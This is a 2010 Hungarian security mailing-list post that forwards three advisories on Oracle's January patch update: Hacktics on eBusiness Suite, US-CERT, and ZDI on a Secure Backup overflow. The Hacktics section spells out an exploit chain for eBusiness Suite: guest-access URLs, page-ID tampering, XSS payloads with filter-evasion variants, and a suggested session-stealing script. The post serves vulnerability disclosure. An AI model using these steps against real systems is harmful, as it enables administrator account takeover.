[guru] Oracle biztonsagi frissitesek
DATE: Tue, 19 Jan 2010 01:05:37 +0100
Kihozták a januári Oracle Critical Patch Update-et, ami összesen 24
biztonsági hibát javít. Két biztonsági hiba részletesebb leírása is
elérhetővé vált: az Oracle eBusiness Suite bizonyos részekhez guest
jogú hozzáférést ad, biztonsági ellenőrzések könnyen kikerülhetőek,
illetve XSS hibát is találtak. A második hibacsoport az Oracle Secure
Backup terméket érinti, ahol is az observiced.exe stack buffer overflow
hibát tartalmaz.
--- Begin Message ---
Hacktics Research Group Security Advisory
http://www.hacktics.com/#details=;view=Resources%7CAdvisory
By Shay Chen, Hacktics.
14-Dec-2009
===========
I. Overview
===========
During a penetration test performed by Hacktics' experts, certain
vulnerabilities were identified in the Oracle eBusiness Suite deployment.
Further research has identified several vulnerabilities which, combined, can
allow an unauthenticated remote user to take over and gain full control over
the administrative web user account of the Oracle eBusiness Suite.
A friendly formatted version of this advisory, including a video
demonstrating step-by-step execution of the exploit, is available in:
http://www.hacktics.com/content/advisories/AdvORA20091214.html
===============
II. The Finding
===============
Three separate issues have been identified:
1. Unauthenticated Guest Access
-------------------------------
It is possible for unauthenticated users to access certain pages with guest
privileges (according to Oracle's security representative - this is a
standard functionality of this component). While some pages may not be
directly accessible as a guest in this manner, this can be bypassed by
taking advantage of the session management behavior in the application.
2. Authorization Bypass
-----------------------
Malicious users can access and manage content of other users, relying on the
lack of access control in the page management interface. Attackers can use
parameter tampering techniques to directly access the resource identifiers
of pages owned by other users, and delete or modify their content.
3. Persistent Cross Site Scripting
----------------------------------
Certain web interfaces in the user's menu management interface enable
attackers to inject malicious scripts into user-specific content, causing
the scripts to be executed in the browser of any user viewing the infected
content (Persistent Cross Site Scripting).
By combining all three vulnerabilities, an unauthenticated attacker can
initially gain guest access, leverage it to access pages belonging to the
administrative user, and inject malicious Java-script into their content, in
order to steal session identifiers, which allow taking over the
administrative user account.
============
III. Details
============
1. Unauthenticated Guest Access
--------------------------------
By accessing certain internal pages directly, attackers can cause the
application to grant them guest access and load certain objects into the
user's server side session. At this point, the attacker is able to access
other internal components in the application as the guest user, including
management services, configuration interfaces and information disclosing
components, etc.
Unauthenticated attackers can bypass the login phase by directly accessing
certain internal URLs such as (partial list):
http://host:port/OA_HTML/OA.jsp
http://host:port/OA_HTML/RF.jsp
When accessing one of these URLs, the system generates an exception and an
error is presented to the client. However, as part of the process, the JSP
code populates the session object of the user with guest privileges. The
attacker can then access other pages in the systems which allow guest
operations, such as:
http://host:port/OA_HTML/AppsChangePassword.jsp
http://host:port/pls/[DADName]/OracleMyPage.home
http://host:port/pls/[DADName]/icx_define_pages.editpagelist
2. Authorization Bypass
-----------------------
Various page management URLs in the Oracle eBusiness Suite rely on the
parameter named [p_page_id] to determine which page to manage. An attacker
can easily access the page of another user, by simply altering that
parameter value to a value representing the other's user page. No
authorization checks are performed to verify the authenticity of the user
attempting the access.
The following proof-of-concept samples are provided (the [p_page_id] has to
be associated with a page of a valid user):
http://host:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
http://host:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME
&p_page_id=[page_id]
http:// host:8888/pls/TEST/oracleconfigure.customize?p_page_id=1
3. Persistent Cross Site Scripting
----------------------------------
Various interfaces under the personal page management interface are
vulnerable to Persistent Cross Site Scripting:
http://host:port/pls/[DADName]/icx_define_pages.editpagelist
http://host:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
An attacker can inject malicious scripts into the various properties of a
new or existing page object (via submitted forms).
http://host:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME
&p_page_id=[page_id]
http://host:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE
The injected script will be executed when the user accesses the main URL:
http://host:port/pls/[DADName]/OracleMyPage.home
It is important to note that our testing has indicated that different
versions have different mitigation levels of this vulnerability, requiring,
in some situations, utilizing XSS evasion techniques to overcome
certain input validation and sanitation mechanisms:
* For earlier versions, injecting a simple <SCRIPT> suffices:
<SCRIPT>alert('XSS')<SCRIPT>
* Some versions limit the permitted characters, and thus require the tester
to inset Java-script without utilizing tags, by injecting a script into the
text box as follows:
");alert('XSS');//
* Later versions appear to also enforce server-side length restrictions on
the vulnerable parameters. As a result, multiple separate injections are
required to achieve script execution, such as:
");/*
*/alert/*
*/(/*
*/'XSS'/*
*/);//
===========
IV. Exploit
===========
The exploit is performed by combining the three vulnerabilities, as
described in the following scenario:
A. Initially, an attacker gains guest access to the system, by first
accessing:
http://host:port/OA_HTML/OA.jsp
While an error is generated at this step, the attacker can proceed now to
the "My Homepage" page, which will now allow guest access:
http://host:port/pls/[DADName]/OracleMyPage.home
B. The attacker now goes to edit his personal homepage, by accessing the
"Edit Page List" URL:
http://host:port/pls/[DADName]/icx_define_pages.editpagelist
The attacker then selects his homepage, and clicks Rename (opening the
following URL):
http://host:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME
&p_page_id=[page_id]
C. The attacker now changes the [p_page_id] to the [p_page_id] of the
victim's page (as this is an incremental ID, simple trial and error could be
used until the administrator's user page is identified).
D. The attacker then uses the Rename Form to change the name of the page
from its original name to an embedded script:
");alert('XSS');//
This script can now be replaced with the relevant payload, for instance, a
script that steals the session ID and sends it to the attacker.
===================
V. Affected Systems
===================
This vulnerability was tested and identified in Oracle eBusiness Suite
versions 10 and 11.
==============================
VI. Vendor's Response/Solution
==============================
Oracle's security alerts group has been notified of this vulnerability in
early November.
According to Oracle, the first issue is not a vulnerability - guest access
is permitted by design. The other two have been acknowledged by Oracle, and
have been fixed in the Jan-2009 CPU:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuj
an2009.html
It is important to note that the default fix for this vulnerability is a
script removing this interface (which is now replaced with a new OA
Framework). Customers unwilling or unable to switch to the new interface,
should apply patch 7567354 which, according to Oracle, fixes these
vulnerabilities on the obsolete packages (Hacktics has not performed tests
to verify this patch).
===========
VII. Credit
===========
These vulnerabilities were discovered by:
Shay Chen, Technical Leader, Security Services, Hacktics.
Additional Contribution:
Gil Cohen, Application Security Consultant, Hacktics.
Oren Hafif, Application Security Consultant, Hacktics.
---
Ofer Maor
CTO, Hacktics
Chairman, OWASP Israel
Web: www.hacktics.com
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA10-012A
Oracle Updates for Multiple Vulnerabilities
Original release date:
Last revised: --
Source: US-CERT
Systems Affected
* Oracle Database 11g, version 11.1.0.7
* Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4
* Oracle Database 10g, version 10.1.0.5
* Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV
* Oracle Application Server 10g Release 3 (10.1.3), versions 10.1.3.4.0, 10.1.3.5, 10.1.3.5.1
* Oracle Application Server 10g Release 2 (10.1.2), version 10.1.2.3.0
* Oracle Access Manager versions 7.0.4.3, 10.1.4.2
* Oracle E-Business Suite Release 12, versions 12.0.4, 12.0.5, 12.0.6, 12.1.1 and 12.1.2
* Oracle E-Business Suite Release 11i, version 11.5.10.2
* PeopleSoft Enterprise HCM (TAM), versions 8.9 and 9.0
* Oracle WebLogic Server 10.0 through MP2, 10.3.0 and 10.3.1
* Oracle WebLogic Server 9.0 GA, 9.1 GA and 9.2 through 9.2 MP3
* Oracle WebLogic Server 8.1 through 8.1 SP6
* Oracle WebLogic Server 7.0 through 7.0 SP7
* Oracle JRockit R27.6.5 and earlier (JDK/JRE 6, 5, 1.4.2)
* Primavera P6 Enterprise Project Portfolio Management 6.1, 6.2.1 and 7.0
* Primavera P6 Web Services 6.2.1, 7.0 and 7.0SP1
Overview
Oracle products and components are affected by multiple
vulnerabilities. The impacts of these vulnerabilities include
remote execution of arbitrary code, information disclosure, and
denial of service.
I. Description
The Oracle Critical Patch Update Advisory - January 2010 addresses
24 vulnerabilities in various Oracle products and components. The
document provides information about affected components, access and
authorization required for successful exploitation, and the impact
from the vulnerabilities on data confidentiality, integrity, and
availability.
Oracle has associated CVE identifiers with the vulnerabilities
addressed in this Critical Patch Update. If significant additional
details about vulnerabilities and remediation techniques become
available, we will update the Vulnerability Notes Database.
II. Impact
The impact of these vulnerabilities varies depending on the
product, component, and configuration of the system. Potential
consequences include the execution of arbitrary code or commands,
information disclosure, and denial of service. Vulnerable
components may be available to unauthenticated, remote attackers.
An attacker who compromises an Oracle database may be able to
access sensitive information.
III. Solution
Apply the appropriate patches or upgrade as specified in the Oracle
Critical Patch Update Advisory - January 2010. Note that this
document only lists newly corrected issues. Updates to patches for
previously known issues are not listed.
IV. References
* Oracle Patch Update Advisory - January 2010 -
<http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html>
* Critical Patch Updates and Security Alerts -
<http://www.oracle.com/technology/deploy/security/alerts.htm>
* Map of Public Vulnerability to Advisory/Alert -
<http://www.oracle.com/technology/deploy/security/critical-patch-updates/public_vuln_to_advisory_mapping.html>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA10-012A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA10-012A Feedback VU#148385" in
the subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2010 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
January 12, 2010: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
iQEVAwUBS0zxEducaIvSvh1ZAQLpPgf/VVrk5FTcPFRdv3map88eLhgVIDpKdQmk
1yWuAcyx1vOjEgOeDrl/DYMoNXI0jjvZ+V2r3KA9J2jO0V77J1g5vwxz9uScaU7v
A4IW/Vv31T55IQmYrCsF6rtu/yhPIair2uiOFjc5xRqnoTsufhZ8wm8EBjnOElsV
8D+SjICgaOwh76WQGGJQK0kW2XkdSmGbu8a/Wwm4WvvZ1ngYeURCW32ZCiqdb+tu
gCaqHCELGBCfwx0CUaWsNIwqIWBkD61JN18rnM8XNkVQ61gkbvBMlMGM/WP5CaGh
epIa3qZafEbzd6iogajxUSxy37iFokKZl/2+5o8DE21QdEAE6iI8qA==
=TaF2
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
ZDI-10-002: Oracle Secure Backup observiced.exe Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-002
January 12, 2010
-- CVE ID:
CVE-2010-0072
-- Affected Vendors:
Oracle
-- Affected Products:
Oracle Secure Backup
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Oracle Secure Backup. Authentication is not
required to exploit this vulnerability.
The specific flaw exists in the Oracle Secure Backup Services daemon
observiced.exe listening on TCP port 10000 by default. Due to the lack
of bounds checking on the reverse lookup of connections to the port a
stack overflow can occur leading to a complete compromise of the
affected system under the credentials of the SYSTEM account.
-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html
-- Disclosure Timeline:
2009-04-20 - Vulnerability reported to vendor
2010-01-12 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
--- End Message ---